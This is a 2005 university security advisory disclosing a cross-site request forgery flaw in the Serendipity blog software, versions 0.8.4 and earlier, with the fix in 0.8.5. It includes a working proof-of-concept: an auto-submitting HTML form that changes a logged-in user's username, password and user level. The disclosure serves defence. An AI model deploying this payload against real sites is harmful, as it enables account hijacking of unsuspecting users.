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Serendipity: Account Hijacking / CSRF Vulnerability
From: Nenad Jovanovic <enji () infosys tuwien ac at>
Date: Thu, 29 Sep 2005 16:04:48 +0200
=========================================================== Serendipity: Account Hijacking / CSRF Vulnerability =========================================================== Technical University of Vienna Security Advisory TUVSA-0509-001, September 29, 2005 =========================================================== Affected applications ---------------------- Serendipity (www.s9y.org) Versions 0.8.4 and prior. Description ------------ An attacker is able to change the username and password of a logged-in user (and can therefore hijack his account) by tricking the user into clicking a link to a page with the following contents:<form action="http://your-server/path-to-s9y/serendipity_admin.php?serendipity[adminModule]=personal&serendipity[adminAction]=save" method="post">
<input type="text" name="username" value="evilguy" />
<input type="text" name="password" value="evilpass" />
<input type="text" name="realname" value="John Doe" />
<input type="text" name="userlevel" value="255"/>
<input type="text" name="email" value="john () example com" />
<input type="text" name="lang" value="en"/>
<input type="submit" name="SAVE" value="Save" />
</form>
<script type="text/javascript">
document.forms[0].submit();
</script>
The fields "your-server" and "path-to-s9y" in the form's action
attribute have to be adjusted accordingly.
Similar attacks (termed as "Cross-Site Request Forgery" or CSRF) can be
launched for performing other requests disguised as the victim.
However, this problem is not limited to Serendipity, but affects a large
number of comparable web applications available at this time.
Solution
---------
Version 0.8.5 of Serendipity is reported by the developers to fix
the Account Hijacking vulnerability as well as the general CSRF problem
itself.
Acknowledgements
-----------------
Thanks to Serendipity developer Garvin Hicking for his quick response
and professional cooperation.
Nenad Jovanovic
Secure Systems Lab
Technical University of Vienna
www.seclab.tuwien.ac.at
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